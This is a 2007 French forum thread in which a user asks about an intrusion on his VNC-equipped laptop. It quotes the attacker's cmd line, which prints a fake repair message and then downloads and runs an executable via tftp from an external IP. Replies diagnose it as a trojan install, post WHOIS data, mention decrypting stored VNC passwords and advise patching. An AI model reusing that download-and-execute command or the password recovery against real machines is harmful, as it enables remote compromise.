Laboratoire Microsoft |  Blog |  Webcast |  Students Club |  FaqXP  |  CertifExpress 
 Le Forum de Référence sur les Technologies Microsoft - http://www.forum-microsoft.org

Hacking d'un PC portable avec VNC

Un forum pour parler de tout ce qui a trait à la sécurité

Modérateurs: Nebil-b, ygainche, Modérateurs_Divers

Hacking d'un PC portable avec VNC

Messagepar ekivok44 sur Ven 30 Mar 2007, 23:17

Bonjour,

ma copine était sur mon PC portable boulot sur lequel il y a VNC server. la souris s'est mise a bouger toute seule. j'ai directement tué la connection. néanmoins, il a lancé cette commande la a partir de "executer" :
Code: Tout sélectionner
%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 75.16.107.121 GET amnbwsh.exe & start amnbwsh&


ça veut dire quoi pour vous?

merci
ekivok44
Grand Master
Grand Master
 
Messages: 1499
Inscrit le: Sam 11 Déc 2004, 17:58
Localisation: Niort

Messagepar TheHinou sur Sam 31 Mar 2007, 0:18

Code: Tout sélectionner
%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 75.16.107.121 GET amnbwsh.exe & start amnbwsh&


comspec /c démarre une nouvelle instance d'un interpreteur de commande et execute les commande passer par une chaine de caractère .

echo repairing user32.dll : c'est juste un affichage d'une gentille phrase bidon
echo Please wait... : juste another phrase bidon.


tftp -i 75.16.107.121 GET amnbwsh.exe & start amnbwsh <-- la c'est plus grave il a fait télécharger un exe et il l'a lancé ....

Donc tu peux en déduire ce que tu veux mais moi a mon avis y'a un mec qui a essayer de t'installer un troyen ... ou une autre cochonnerie.

Si tu n'as pas de mdp sur ton vnc je t'inviterais a en mettre un sinon si tu en as un je t'invite a ne pas laisser ta base de registre consultable à distance
Avatar de l’utilisateur
TheHinou
Grand Master
Grand Master
 
Messages: 1773
Inscrit le: Mar 17 Jan 2006, 15:25

Messagepar raybones sur Sam 31 Mar 2007, 3:10

Code: Tout sélectionner
CustName:   PPPoX Pool - rback6.crchtx 1035 051006
Address:    Private Address
City:       Plano
StateProv:  TX
PostalCode: 75075
Country:    US
RegDate:    2006-05-10
Updated:    2006-05-10

NetRange:   75.16.96.0 - 75.16.111.255
CIDR:       75.16.96.0/20
NetName:    SBC07501609600020060510104257
NetHandle:  NET-75-16-96-0-1
Parent:     NET-75-0-0-0-1
NetType:    Reassigned
Comment:    Abuse contact abuse@swbell.net, Technical contact noc@sbcis.sbc.com
RegDate:    2006-05-10
Updated:    2006-05-10

OrgAbuseHandle: ABUSE6-ARIN
OrgAbuseName:   Abuse - Southwestern Bell Internet
OrgAbusePhone:  +1-800-648-1626
OrgAbuseEmail:  abuse@sbcglobal.net

OrgNOCHandle: SUPPO-ARIN
OrgNOCName:   Support - Southwestern Bell Internet Services
OrgNOCPhone:  +1-800-648-1626
OrgNOCEmail:  support@swbell.net

OrgTechHandle: IPADM2-ARIN
OrgTechName:   IPAdmin-SBIS
OrgTechPhone:  +1-800-648-1626
OrgTechEmail:  ipadmin@att.com
Image
Image
Image
Avatar de l’utilisateur
raybones
Full Member
Full Member
 
Messages: 226
Inscrit le: Mer 29 Déc 2004, 19:45
Localisation: France

Messagepar ekivok44 sur Sam 31 Mar 2007, 7:13

mais j'ai un mot de passe sur mon VNC de 7 caractères!!!
de plus j'étais en 56k donc j'ai eu le temps de réagir.

Pour le TFTP, j'avais bien compris qu'il essayé d'installer un programme a partir de son PC via un serveur TFTP. De plus dans l'observateur d'événement il y a bien une connexion via la meme IP que le TFTP. par contre il n'est pas passé par le port 5900... étrange. il est passé par le port 3972.

comment ils a réussi a avoir mon mot de passe VNC? il y a une faille dans VNC?
ekivok44
Grand Master
Grand Master
 
Messages: 1499
Inscrit le: Sam 11 Déc 2004, 17:58
Localisation: Niort

Messagepar TheHinou sur Dim 01 Avr 2007, 18:27

Le mot de passe VNC est stocker dans la base de registre en crypté mais bon t'as des prog pour les décrypter.

J'en ai utiliser un, une fois sur une machine en lan qui après une manipulation stupide avait perdu les driver usb donc plus de clavier ni de souris ... et comme le mdp VNC était inconnu j'ais récupérer le mdp crypter via un script vbs, utiliser le prog et en moins de 3 mins j'avais le mdp

http://www.governmentsecurity.org/archive/t12186.html

Donc pour peu que t'ais ta base de registre accessible a distance ... ou alors tu utilises une version non securisé

http://www.digg.com/software/VNC_hack_t ... t_password
Avatar de l’utilisateur
TheHinou
Grand Master
Grand Master
 
Messages: 1773
Inscrit le: Mar 17 Jan 2006, 15:25

Messagepar ekivok44 sur Dim 01 Avr 2007, 20:39

j'utilise REALVNC, le firewall XP activé, et le PC branché en direct via une connexion RTC afin de faire une connexion CIsco VPN a mon entreprise
ekivok44
Grand Master
Grand Master
 
Messages: 1499
Inscrit le: Sam 11 Déc 2004, 17:58
Localisation: Niort

Messagepar TheHinou sur Lun 02 Avr 2007, 11:17

Mets à jour ton realvnc ... c'est justement une des rare version où des explois d'acces sans utilisation de mot de passe est faisable
Avatar de l’utilisateur
TheHinou
Grand Master
Grand Master
 
Messages: 1773
Inscrit le: Mar 17 Jan 2006, 15:25

Messagepar Koj sur Jeu 05 Avr 2007, 14:57

VNC Personal Edition 4.2.3

General changes : FIXED: Security vulnerability

http://www.realvnc.com/products/persona ... notes.html

Koj
Transcript: http://www.microsoft.com/learning/mcp/transcripts (ID: 672446 Pass: ShowToUs).
Avatar de l’utilisateur
Koj
Grand Master
Grand Master
 
Messages: 1178
Inscrit le: Lun 23 Aoû 2004, 21:57
Localisation: Paris


Retourner vers Sécurité

Qui est en ligne ?

Utilisateurs parcourant actuellement ce forum : Aucun utilisateur inscrit et 0 invités



Accueil | News | Articles | Tips | Outils | FAQ XP | Certification | Easters Eggs
Essentiels | Top Sites | Glossaire | Vidéos | Whitepapers | Essentiels | Boîte à Scripts
Conditions d'utilisation é Copyright | Respect de la vie privée